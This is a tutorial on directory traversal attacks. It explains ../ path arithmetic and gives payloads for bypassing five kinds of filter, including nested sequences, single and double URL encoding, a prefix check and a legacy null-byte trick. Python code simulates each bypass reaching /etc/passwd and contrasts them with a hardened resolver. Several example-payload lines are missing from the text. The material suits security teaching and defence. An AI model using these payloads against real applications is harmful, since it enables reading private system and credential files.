Directory Traversal Attack: Security Misconfiguration
What is Directory Traversal Attack?
Web applications consist of two categories of files:
- Configuration files or other elements on the file system (the URLs exposed by the web server route to specific files on disk).
Usually, the files on disk are laid out in the same way as the web application's URL structure. A badly designed application lets the client choose which file is read and serves files that were never meant to be public. This allows an attacker to download or read sensitive information from the system, and where the same parameter is used for writing, to inject malicious payloads, copy data or modify data.
How To Detect Directory Traversal Attack Or Vulnerability?
In the most common scenario you check the GET parameters of a request for a value that names a file. You can see this by looking at this URL:
Examine the end of the URL
This page takes a parameter filename with the value 30.jpg. You can play with this parameter to check whether the application is vulnerable by manipulating the file name. Usually you have to try several payloads because of filtering and error handling. I tried 31.jpg in place of 30.jpg and it returned another image. That only shows the parameter selects a file by name; the actual test for traversal is whether a value containing ../ leaves the image directory and returns a file from elsewhere on the server.
How to Access Arbitrary Files with Directory Traversal Attack?
In a web application, we can use the relative or absolute path of a file or directory to navigate through multiple directories. Let's say there is a file named "passwd" located at /etc/passwd. This path of the file from the root directory is known as the absolute path.
Assume the web server's working directory is /var/www/html (a common location for web pages; the real web root varies by server and must be discovered or guessed). To perform the directory traversal, we have to reach the path of the file we want to retrieve (in this case the "passwd" file). You can first try to get the file by entering its absolute path, /etc/passwd. If this does not work, the other way is to enter its relative path in the URL.
What is the relative path of a file: the path of a file relative to the current working directory is called the relative path. Assume we want to access the file whose absolute path is /etc/passwd and, as mentioned before, the working directory is /var/www/html. The relative path of the file is then ../../../etc/passwd.
The payload will look like this in the URL:
Understanding the role of (../)
This sequence takes you one level up in the directory tree. If you are currently in /var/www/html, typing ../ once takes you to /var/www, twice to /var, and three times to /. Since we want to reach /etc/passwd, we use the payload ../../../etc/passwd. Once you are at /, further ../ sequences have no effect, so when the depth of the web root is unknown you can safely use more ../ than you think you need. In this way we can work out the relative path of any file or directory.
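To make the path arithmetic above concrete, here is an added Python example (not code from the original article) that computes the ../ payload for any working directory and target, walks up one level at a time, and shows that extra ../ beyond the root are harmless. The working directory /var/www/html and target /etc/passwd are the page's own; paths are assumed POSIX and nothing touches the real file system.

```python
import posixpath


def walk_up(cwd: str, steps: int) -> list[str]:
    """Directory reached after each successive '../' applied to cwd.
    Stepping above '/' stays at '/', which is why surplus '../' are harmless."""
    dirs = []
    here = cwd
    for _ in range(steps):
        here = posixpath.normpath(posixpath.join(here, ".."))
        dirs.append(here)
    return dirs


def traversal_payload(cwd: str, target: str) -> str:
    """Relative path from the server's working directory to the target file,
    i.e. the value to put in the vulnerable filename parameter."""
    return posixpath.relpath(target, cwd)


def resolve(cwd: str, payload: str) -> str:
    """What the OS does with cwd + payload: collapse every '..' component.
    This is the naive join a vulnerable handler performs."""
    return posixpath.normpath(posixpath.join(cwd, payload))


if __name__ == "__main__":
    cwd, target = "/var/www/html", "/etc/passwd"
    print("walk:", " -> ".join(walk_up(cwd, 4)))
    print("payload:", traversal_payload(cwd, target))
    # Eight '../' from a depth-3 directory still lands on the same file.
    print("over-traversal:", resolve(cwd, "../" * 8 + "etc/passwd"))
```

traversal_payload gives the minimal sequence; in practice you rarely know the depth of the web root, so sending a generous number of ../ (as the over-traversal line does) is the usual first probe.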
What are the Problems while Exploiting Directory Traversal vulnerability?
The application blocks traversal sequences
Although traversal sequences are blocked, the application treats the supplied path as relative to a default working directory and does not reject an absolute one. You can then access the file by entering its absolute path in the URL, for example setting the filename parameter to /etc/passwd.
The application strips path traversal sequences from the user-supplied filename before using it
You might be able to use nested traversal sequences, which collapse to a simple traversal sequence once the inner sequence is stripped. This works when the stripping is done once rather than repeated until nothing changes. Modify the filename as shown below:
You can also try the payload as:
Input containing path traversal sequences is rejected by the program
The program rejects input containing path traversal sequences and then URL-decodes the input before using it. You can bypass this with URL encoding. Encoded once, ../ becomes %2e%2e%2f (%2e is the dot and %2f the slash); this passes a check on the raw value and turns back into ../ when decoded. If the application decodes the input once before the check and again afterwards, single encoding is caught, so use double URL encoding instead: %252e%252e%252f, where %25 is the encoded percent sign, decodes first to %2e%2e%2f and then to ../. You can use the payload as follows:
Where a single decode happens after the check, %2e%2e%2f is enough for ../, and you can use the payload as:
The program passes the full file path in a request parameter
In this case the program verifies that the supplied path begins with an expected base folder. If the program requires the file path to start with /var/www/images, begin the payload with that folder and then traverse out of it with ../ sequences to reach /etc/passwd, as shown below:
The program validates that the given filename ends with the specified file extension
In this case, the program checks that the file name ends with the expected extension, say .png. You can append the required extension after a null byte, %00: the check on the full string passes, while the underlying file-system call, which treats the null as the end of the string, opens the file named before it. This works only where the runtime hands the string to a C-style API without rejecting embedded nulls; PHP stopped accepting null bytes in file paths in version 5.3.4, and current versions of most runtimes reject them, so treat this as a legacy technique. You can use the payload as follows:
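The five filter patterns above, and the payload that defeats each, modelled in Python. This is an added example, not code from the original article: the web root /var/www/images, the target /etc/passwd and each filter's exact behaviour are assumptions chosen to mirror the text, and file access is simulated by path resolution so nothing touches the real file system. The null-byte case is simulated because Python itself rejects embedded nulls in paths. A hardened resolver is included for contrast.

```python
import posixpath
from urllib.parse import unquote

WEB_ROOT = "/var/www/images"   # assumed directory the application serves from
TARGET = "/etc/passwd"         # the file each payload tries to reach


def naive_resolve(user_path: str) -> str:
    """What an unprotected handler does: glue the parameter onto the web root
    and let the OS collapse '..'. An absolute parameter replaces the root,
    exactly as os.path.join would."""
    return posixpath.normpath(posixpath.join(WEB_ROOT, user_path))


# 1. Traversal sequences blocked, but an absolute path is still accepted.
def filter_block_traversal(p: str):
    return None if "../" in p else naive_resolve(p)


# 2. '../' stripped once, non-recursively, before use.
def filter_strip_once(p: str):
    return naive_resolve(p.replace("../", ""))


# 3a. Raw value checked for '../', then URL-decoded before use.
def filter_check_then_decode(p: str):
    return None if "../" in p else naive_resolve(unquote(p))


# 3b. Decoded once, checked, then decoded again by a later layer.
def filter_decode_check_decode(p: str):
    once = unquote(p)
    return None if "../" in once else naive_resolve(unquote(once))


# 4. Path must begin with the expected base folder.
def filter_prefix(p: str):
    return naive_resolve(p) if p.startswith(WEB_ROOT) else None


# 5. Name must end with .png; the file-system call is a legacy C API that
#    stops reading at the first NUL byte (simulated here with split).
def filter_extension_legacy(p: str):
    if not p.endswith(".png"):
        return None
    truncated = unquote(p).split("\x00", 1)[0]
    return naive_resolve(truncated)


# Filter -> the bypass payload from the text (assumed, constructed inputs).
BYPASSES = {
    "block ../, accept absolute": (filter_block_traversal, "/etc/passwd"),
    "strip ../ once": (filter_strip_once, "....//....//....//etc/passwd"),
    "check then decode": (filter_check_then_decode,
                          "%2e%2e%2f%2e%2e%2f%2e%2e%2fetc/passwd"),
    "decode, check, decode": (filter_decode_check_decode,
                              "%252e%252e%252f%252e%252e%252f%252e%252e%252fetc/passwd"),
    "require base-folder prefix": (filter_prefix, "/var/www/images/../../../etc/passwd"),
    "require .png (legacy NUL)": (filter_extension_legacy, "../../../etc/passwd%00.png"),
}


def run_bypasses() -> dict:
    """Map each filter name to the path its bypass payload actually resolves to."""
    return {name: fn(payload) for name, (fn, payload) in BYPASSES.items()}


def safe_resolve(p: str):
    """Hardened version: decode, normalise, then require the result to stay
    inside WEB_ROOT; reject NUL bytes outright. In production also resolve
    symlinks with os.path.realpath before the containment check."""
    decoded = unquote(p)
    if "\x00" in decoded:
        return None
    candidate = posixpath.normpath(posixpath.join(WEB_ROOT, decoded))
    if candidate != WEB_ROOT and not candidate.startswith(WEB_ROOT + "/"):
        return None
    return candidate


if __name__ == "__main__":
    for name, path in run_bypasses().items():
        print(f"{name:28s} -> {path}")
    for _, payload in BYPASSES.values():
        print(f"safe_resolve({payload!r}) -> {safe_resolve(payload)}")
```

Every filter in BYPASSES resolves its payload to /etc/passwd, while safe_resolve either refuses the same payloads or maps them to a harmless name inside the web root (a double-encoded payload, for instance, stays a literal file name containing %2e). The lesson is that denylisting ../ in any form loses to encoding and nesting; the reliable check is on the canonical, fully decoded path after it has been joined to the base directory.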